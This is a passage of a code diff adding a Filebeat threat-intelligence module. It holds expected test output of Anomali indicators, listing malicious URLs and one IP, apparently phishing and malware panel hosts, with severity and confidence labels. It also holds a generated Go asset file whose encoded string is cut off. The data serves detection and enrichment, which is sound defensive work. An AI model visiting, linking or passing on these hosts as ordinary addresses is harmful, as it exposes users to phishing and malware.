"threatintel.anomali.modified": "2020-01-25T02:57:38.214Z", + "threatintel.anomali.name": "mal_url: http://f0391587.xsph.ru/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://f0391587.xsph.ru/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:57:38.214Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "f0391587.xsph.ru", + "threatintel.indicator.url.original": "http://f0391587.xsph.ru/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 50638, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484367; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-67" + ], + "threatintel.anomali.modified": "2020-01-25T02:57:47.281Z", + "threatintel.anomali.name": "mal_url: http://46.161.27.57:8080/northon/", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://46.161.27.57:8080/northon/']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:57:47.281Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "46.161.27.57", + "threatintel.indicator.url.original": "http://46.161.27.57:8080/northon/", + "threatintel.indicator.url.path": "/northon/", + "threatintel.indicator.url.port": 8080, + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 51243, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484342; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-79" + ], + "threatintel.anomali.modified": "2020-01-25T02:57:51.296Z", + "threatintel.anomali.name": "mal_url: http://f0393086.xsph.ru/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://f0393086.xsph.ru/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:57:51.296Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "f0393086.xsph.ru", + "threatintel.indicator.url.original": "http://f0393086.xsph.ru/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 51858, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484363; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-87" + ], + "threatintel.anomali.modified": "2020-01-25T02:57:56.007Z", + "threatintel.anomali.name": "mal_url: http://insuncos.com/files1/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://insuncos.com/files1/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:57:56.007Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "insuncos.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://insuncos.com/files1/panel/admin.php", + "threatintel.indicator.url.path": "/files1/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 52460, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484339; iType: mal_url; State: active; Org: DDoS-GUARD GmbH; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-89" + ], + "threatintel.anomali.modified": "2020-01-25T02:57:56.044Z", + "threatintel.anomali.name": "mal_url: http://tg-h.ru/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://tg-h.ru/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:57:56.044Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "tg-h.ru", + "threatintel.indicator.url.original": "http://tg-h.ru/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 53022, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484351; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-86" + ], + "threatintel.anomali.modified": "2020-01-25T02:58:11.038Z", + "threatintel.anomali.name": "mal_url: http://wusetwo.xyz/public_html/file/five/inc/class/pCharts/info/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://wusetwo.xyz/public_html/file/five/inc/class/pCharts/info/Panel/five/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:58:11.038Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "wusetwo.xyz", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://wusetwo.xyz/public_html/file/five/inc/class/pCharts/info/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/public_html/file/five/inc/class/pCharts/info/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 53740, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484366; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-64" + ], + "threatintel.anomali.modified": "2020-01-25T02:58:20.420Z", + "threatintel.anomali.name": "mal_url: http://185.234.217.36/northon/", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://185.234.217.36/northon/']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:58:20.420Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "185.234.217.36", + "threatintel.indicator.url.original": "http://185.234.217.36/northon/", + "threatintel.indicator.url.path": "/northon/", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 54330, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484354; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-84" + ], + "threatintel.anomali.modified": "2020-01-25T02:58:20.448Z", + "threatintel.anomali.name": "mal_url: http://topik07.mcdir.ru/papka/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://topik07.mcdir.ru/papka/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:58:20.448Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "topik07.mcdir.ru", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://topik07.mcdir.ru/papka/admin.php", + "threatintel.indicator.url.path": "/papka/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 54924, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484362; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-87" + ], + "threatintel.anomali.modified": "2020-01-25T02:58:33.189Z", + "threatintel.anomali.name": "mal_url: http://insuncos.com/files2/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://insuncos.com/files2/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:58:33.189Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "insuncos.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://insuncos.com/files2/panel/admin.php", + "threatintel.indicator.url.path": "/files2/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 55526, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484364; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-47" + ], + "threatintel.anomali.modified": "2020-01-25T02:58:49.056Z", + "threatintel.anomali.name": "mal_url: http://185.234.218.68/kaspersky/", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://185.234.218.68/kaspersky/']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:58:49.056Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "185.234.218.68", + "threatintel.indicator.url.original": "http://185.234.218.68/kaspersky/", + "threatintel.indicator.url.path": "/kaspersky/", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 56123, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484357; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-89" + ], + "threatintel.anomali.modified": "2020-01-25T02:58:59.472Z", + "threatintel.anomali.name": "mal_url: http://officelog.org/inc/js/jstree/mh/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://officelog.org/inc/js/jstree/mh/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:58:59.472Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "officelog.org", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://officelog.org/inc/js/jstree/mh/panel/admin.php", + "threatintel.indicator.url.path": "/inc/js/jstree/mh/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 56745, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484359; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-89" + ], + "threatintel.anomali.modified": "2020-01-25T02:59:27.070Z", + "threatintel.anomali.name": "mal_url: http://officelog.org/inc/js/jstree/ch/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://officelog.org/inc/js/jstree/ch/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:59:27.070Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "officelog.org", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://officelog.org/inc/js/jstree/ch/panel/admin.php", + "threatintel.indicator.url.path": "/inc/js/jstree/ch/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 57364, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484358; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-89" + ], + "threatintel.anomali.modified": "2020-01-25T02:59:28.967Z", + "threatintel.anomali.name": "mal_url: http://officelog.org/inc/js/jstree/dar/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://officelog.org/inc/js/jstree/dar/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:59:28.967Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "officelog.org", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://officelog.org/inc/js/jstree/dar/panel/admin.php", + "threatintel.indicator.url.path": "/inc/js/jstree/dar/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 57988, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484352; iType: mal_url; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-81" + ], + "threatintel.anomali.modified": "2020-01-25T02:59:37.661Z", + "threatintel.anomali.name": "mal_url: http://oaa-my.com/cage/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://oaa-my.com/cage/five/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:59:37.661Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "oaa-my.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://oaa-my.com/cage/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/cage/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 58627, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484224; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-53" + ], + "threatintel.anomali.modified": "2020-01-25T02:59:37.692Z", + "threatintel.anomali.name": "mal_ip: 192.64.118.56", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[ipv4-addr:value = '192.64.118.56']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:59:37.692Z", + "threatintel.indicator.ip": "192.64.118.56", + "threatintel.indicator.type": "ipv4-addr" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 59173, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55253484361; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-87" + ], + "threatintel.anomali.modified": "2020-01-25T02:59:54.296Z", + "threatintel.anomali.name": "mal_url: http://insuncos.com/files3/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://insuncos.com/files3/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-25T02:59:54.296Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "insuncos.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://insuncos.com/files3/panel/admin.php", + "threatintel.indicator.url.path": "/files3/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/threatintel/fields.go b/x-pack/filebeat/module/threatintel/fields.go new file mode 100644 index 000000000000..7dce52402df1 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/fields.go @@ -0,0 +1,23 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +// Code generated by beats/dev-tools/cmd/asset/asset.go - DO NOT EDIT. + +package threatintel + +import ( + "github.com/elastic/beats/v7/libbeat/asset" +) + +func init() { + if err := asset.SetFields("filebeat", "threatintel", asset.ModuleFieldsPri, AssetThreatintel); err != nil { + panic(err) + } +} + +// AssetThreatintel returns asset data. +// This is the base64 encoded gzipped contents of module/threatintel. +func AssetThreatintel() string { + return "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